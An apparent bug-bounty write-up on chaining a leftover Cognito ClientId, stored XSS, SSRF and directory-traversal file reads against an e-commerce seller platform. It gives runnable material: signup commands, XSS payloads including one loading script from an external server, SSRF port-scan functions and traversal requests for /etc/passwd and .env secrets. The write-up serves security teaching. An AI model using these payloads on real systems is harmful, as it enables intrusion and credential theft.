Hi everyone, I hope you're doing well. In this first article, I'll be sharing how I discovered and chained together multiple vulnerabilities that ultimately allowed me to access internal files from a restricted application dashboard.
TL;DR
The web app disallowed self-service signup in the UI, but used AWS Cognito for auth. A second, forgotten Cognito ClientId in publicly-served JS allowed me to sign up and confirm an account via the AWS CLI. After logging in I could call several internal API endpoints (some legacy) and found multiple high-impact issues: stored XSS in product descriptions, an unrestricted SSRF via an image retrieval endpoint, several IDORs and — critically — an LFI in a template/download endpoint that allowed directory traversal to read sensitive files (including .env, Dockerfiles, DB backups).
The Target
It's an e-commerce platform designed for sellers on marketplaces such as eBay and Amazon. It offered features like product and inventory management, as well as order processing and related functionalities.
Recon & initial findings
I opened app.target.com and noticed that the signup UI required an in-person provisioning step with staff, meaning there was no public signup available through the interface. I attempted to log in with random credentials to observe the client-side authentication flows. These requests revealed that the application was using AWS Cognito as its managed identity service. While examining the login request and the JavaScript bundles loaded by the app, I discovered two Cognito ClientId values: one used in the visible login flow, which was disabled for signup, and another referenced elsewhere in the JavaScript that still allowed account creation.
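Digging ClientIds out of JavaScript bundles can be done with a quick grep. A minimal sketch — the bundle path is a placeholder, and the pattern assumes the typical Cognito app client ID shape (a 26-character lowercase alphanumeric string):

```shell
extract_client_ids() {
  # Pull anything shaped like a Cognito app client ID out of a downloaded
  # JS bundle. The 26-character length is the common case, not a guarantee.
  grep -oE '[a-z0-9]{26}' "$1" | sort -u
}

# Usage (bundle URL is illustrative):
#   curl -s https://app.target.com/static/js/main.js -o main.js
#   extract_client_ids main.js
```

Any ID that comes back and differs from the one used by the visible login flow is worth testing separately.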
It's important to note that Cognito allows developers to disable signups if they do not want users registering directly - however, misconfigurations in this setting are unfortunately quite common.
Account creation
- Using the discovered ClientId, sign up via the AWS CLI:

```shell
aws cognito-idp sign-up \
  --client-id <client_id> \
  --username <username> \
  --password '<Password123!>' \
  --user-attributes Name=email,Value=<email@example.com> \
  --region <region>
```

- Confirm the account using the confirmation code received by email:
```shell
aws cognito-idp confirm-sign-up \
  --client-id <client_id> \
  --username <username> \
  --confirmation-code <CODE_FROM_EMAIL> \
  --region <region>
```

After confirming the account, I was able to log in through the application as a paid user, gaining full access to all premium features and services.
Post-login: finding sensitive endpoints
Although the UI redirected to a "staff provisioning" waiting page, the JavaScript served by the app referenced numerous API endpoints. Directly accessing these endpoints (/v1/settings/*, /v1/product/*, etc.) revealed that many were functional even though the account was not fully provisioned, allowing further testing.
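Checking which of those endpoints respond for an unprovisioned account is easy to script. A sketch — the host, the Authorization header name, and the endpoint list are illustrative assumptions:

```shell
# Probe API paths with the Cognito token and print the status code for each;
# anything other than 401/403 for an unprovisioned account is worth a look.
probe_endpoints() {
  local token=$1; shift
  for path in "$@"; do
    code=$(curl -s -o /dev/null -w '%{http_code}' \
      -H "Authorization: Bearer $token" \
      "https://app.target.com$path")
    printf '%s %s\n' "$code" "$path"
  done
}

# Usage: probe_endpoints "$TOKEN" /v1/settings/parameters /v1/product/images
```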
Stored XSS in product descriptions
The product description field did not properly sanitize input, allowing HTML and JavaScript to be stored and executed.
- Quick confirmation:

```html
"><img src=x onerror=alert(document.cookie);>
```

- Blind XSS payload:

```html
"><script src="http://<bxss-server>/"></script>
```

SSRF via image retrieval endpoint
- Endpoint: GET /v1/product/images?url=https://assets.target.com/...
- This endpoint fetched product images from an S3 bucket (assets.target.com).
- Replacing the url parameter with a server I controlled (?url=http://my-server.com/test) produced an HTTP request from the application's IP.

- Tested for access to internal services:
  - AWS metadata endpoints: no response.
  - localhost: successful connection.
- Port scanning localhost: identified several open ports.
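Port scanning through an SSRF endpoint amounts to looping over ports and watching for a differential. A sketch — the port list is illustrative, and the distinguishing signal (status code vs. response size vs. latency) is an assumption to calibrate per target:

```shell
# Scan localhost via the SSRF endpoint; open and closed ports usually
# produce different status codes, sizes, or response times.
ssrf_scan() {
  local token=$1
  for port in 22 80 443 3306 6379 8080 9200 27017; do
    code=$(curl -s -o /dev/null -w '%{http_code}' \
      -H "Authorization: Bearer $token" \
      "https://app.target.com/v1/product/images?url=http://localhost:$port/")
    printf 'port %-5s -> HTTP %s\n' "$port" "$code"
  done
}
```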
- Bypassing Firewall Rules:
A key finding was that the SSRF could bypass the Nginx reverse proxy. Directly accessing app.target.com/private from my IP returned a 403 Forbidden from Nginx, but requesting it via the SSRF endpoint (/v1/product/images?url=http://localhost:8080/private) caused the application to process the request internally and return a 404 Not Found, confirming the bypass. I used this behavior to fuzz additional internal endpoints; however, the SSRF endpoint was rate-limited, so after some limited fuzzing I didn't find anything further of interest.
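The 403-vs-404 comparison above generalizes into a simple differential check. A sketch under the same assumptions as before (host, header name, and internal port 8080 taken from the request above):

```shell
# Compare the status code from the edge with the one obtained via SSRF for
# the same path; a 403 externally but a different code internally means the
# request is being originated inside the perimeter.
check_bypass() {
  local token=$1 path=$2
  edge=$(curl -s -o /dev/null -w '%{http_code}' "https://app.target.com$path")
  internal=$(curl -s -o /dev/null -w '%{http_code}' \
    -H "Authorization: Bearer $token" \
    "https://app.target.com/v1/product/images?url=http://localhost:8080$path")
  printf 'edge=%s internal=%s %s\n' "$edge" "$internal" "$path"
}
```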

Local File Inclusion (LFI)
Legacy endpoints discovered in the JavaScript files were used to view and download template files. By manipulating the view and download parameters with directory-traversal sequences, it was possible to read arbitrary files on the server:

```
GET /v1/settings/parameters?do=templates&fo=template_2022&download=../../../../../../../../../../etc/passwd
```
```
GET /v1/settings/parameters?do=templates&fo=template_2022&view=../../app/.env&source=true
```

The .env file contained a trove of sensitive credentials, including but not limited to:

- AWS Access/Secret Keys
- SMTP, FTP, and WordPress credentials
- MongoDB and Redis connection strings with passwords
- Stripe API keys
- Salesforce credentials
- Various other application secrets
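Once the traversal depth and parameter names are known, reading other high-value files is a matter of substituting paths. A sketch — the two-level `../../` prefix mirrors the .env request above, and any candidate file list is illustrative:

```shell
# Build the LFI URL for a given server-side path, relative to the template
# directory established by the working request above.
lfi_url() {
  printf 'https://app.target.com/v1/settings/parameters?do=templates&fo=template_2022&view=../../%s&source=true' "$1"
}

# Usage: for f in app/.env app/Dockerfile; do curl -s "$(lfi_url "$f")"; done
```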
The Takeaway
This engagement illustrates a critical security principle: defense-in-depth matters. A single misconfiguration - in this case, a Cognito signup weakness - provided the initial foothold that made it possible to uncover deeper application vulnerabilities.
It's a textbook example of small misconfiguration + exposed legacy endpoints = large impact. Even when the UI blocks a flow (for example, signup), public assets like JavaScript files can hide authentication backdoors.
Don't overcomplicate your testing - try simple payloads first. Many applications are permissive, and straightforward inputs often reveal more than elaborate, heavily encoded payloads.
Thank you for reading; I hope you learned something new.
Find me at : https://x.com/pwnx0